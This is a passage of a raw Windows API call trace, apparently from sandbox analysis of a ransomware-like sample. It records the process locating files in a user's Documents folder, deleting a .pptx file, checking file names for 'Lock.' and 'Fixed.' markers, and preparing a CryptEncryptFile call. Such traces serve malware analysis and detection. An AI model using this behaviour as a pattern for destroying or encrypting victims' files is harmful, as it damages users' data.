lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.780] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.781] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.782] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.782] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.782] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.782] FreeLibrary (hLibModule=0x756e0000) returned 1 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.782] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.782] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.782] CloseHandle (hObject=0x2d0) returned 1 [0267.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.785] CloseHandle (hObject=0x2a0) returned 1 [0267.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.792] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.792] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.793] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/vai5o9F.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx", lpFilePart=0x8cedf4*="vai5o9F.pptx") returned 0x26 [0267.793] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vai5o9f.pptx")) returned 0x20 [0267.793] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaadf30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xdfa92990, ftLastAccessTime.dwHighDateTime=0x1d581a5, ftLastWriteTime.dwLowDateTime=0xdfa92990, ftLastWriteTime.dwHighDateTime=0x1d581a5, nFileSizeHigh=0x0, nFileSizeLow=0x11319, dwReserved0=0x1, dwReserved1=0x1c, cFileName="vai5o9F.pptx", cAlternateFileName="VAI5O9~1.PPT")) returned 0xa870d0 [0267.793] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vai5o9f.pptx")) returned 1 [0267.800] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaadf30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xdfa92990, ftLastAccessTime.dwHighDateTime=0x1d581a5, ftLastWriteTime.dwLowDateTime=0xdfa92990, ftLastWriteTime.dwHighDateTime=0x1d581a5, nFileSizeHigh=0x0, nFileSizeLow=0x11319, dwReserved0=0x1, dwReserved1=0x1c, cFileName="vai5o9F.pptx", cAlternateFileName="VAI5O9~1.PPT")) returned 0 [0267.800] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0267.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.800] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0267.800] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0267.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4e) returned 0x2e558d8 [0267.801] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/vai5o9F.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx", lpFilePart=0x8cf650*="vai5o9F.pptx") returned 0x26 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.801] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vai5o9F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vai5o9f.pptx")) returned 0xffffffff [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.802] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0267.802] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.802] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0267.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0267.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VQCf4sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QCf4sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cf4sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f4sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sXQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XQz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0267.884] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VQCf4sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QCf4sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cf4sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f4sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sXQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XQz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.886] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.886] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: 